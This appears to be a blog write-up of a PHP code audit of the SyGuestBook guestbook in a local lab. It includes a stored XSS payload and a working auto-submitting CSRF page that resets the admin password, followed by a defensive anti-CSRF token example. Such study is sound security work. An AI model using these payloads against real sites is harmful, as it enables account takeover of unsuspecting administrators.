layout: post
author: fragrant
tags: php code audit

Code Audit Practice

0x01 Preparation

  • Windows 10, PhpStudy
  • PHP basics, MySQL basics, VSC
  • SyGuestBook_A5.zip

0x02 Vulnerabilities

0x001 Stored XSS in the guestbook

whoami
2453465
if i were a boy!<img/src/onerror=alert(/aa/)>

0x002 Stored XSS in the back-end administrator reply/review function

0x003 CSRF vulnerability in the password change function

SyGuestCSRF.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<!-- The form is submitted automatically as soon as the page loads -->
<body onload="document.forms[0].submit();">
<form id="form1" name="form1" action="http://192.168.122.120/code_audit/SyGuestBook_A5/index.php?c=Administrator&a=update&id=1&submit=aaa" method="post">
  <input name="username" type="hidden" value="admin">
  <input name="pass_new" type="hidden" value="admin123">
  <input name="admin" type="hidden" value="admin">
  <input name="gid" type="hidden" value="0">
</form>
</body>
</html>

When the logged-in administrator opens the link http://10.0.0.5:2398/SyGuestCSRF.html, the password is changed to admin123.
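
The request above succeeds because the update action accepts any POST that arrives with the administrator's session cookie. The following is an added example, not code from this post or from SyGuestBook, of a per-session anti-CSRF token check that would reject it; the function names `csrf_token` and `csrf_check` and the `csrf_token` field name are hypothetical.

```php
<?php
// Added example: hypothetical CSRF guard for a password-change action.
// Function and field names are illustrative, not taken from SyGuestBook.
declare(strict_types=1);

// Issue (or reuse) a per-session token; the application embeds it in its
// own password-change form as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST that carries the
// token stored in the session. hash_equals() compares in constant time.
function csrf_check(array $session, string $method, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Constructed demo: an in-memory array stands in for $_SESSION.
$session = [];
$token = csrf_token($session);

// Fields as sent by the auto-submitting page: no token, because a
// cross-site page cannot read the victim's session.
$forged = ['username' => 'admin', 'pass_new' => 'admin123',
           'admin' => 'admin', 'gid' => '0'];

// Fields as sent by the application's own form, which includes the token.
$legit = $forged + ['csrf_token' => $token];

foreach (['cross-site form' => $forged, 'application form' => $legit] as $label => $post) {
    $verdict = csrf_check($session, 'POST', $post) ? 'accepted' : 'rejected';
    echo $label, ': ', $verdict, PHP_EOL;
}
```

In the application, the check would run at the top of the update action with `$_SESSION`, `$_SERVER['REQUEST_METHOD']` and `$_POST`; requiring the current password in the same form adds a second barrier.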
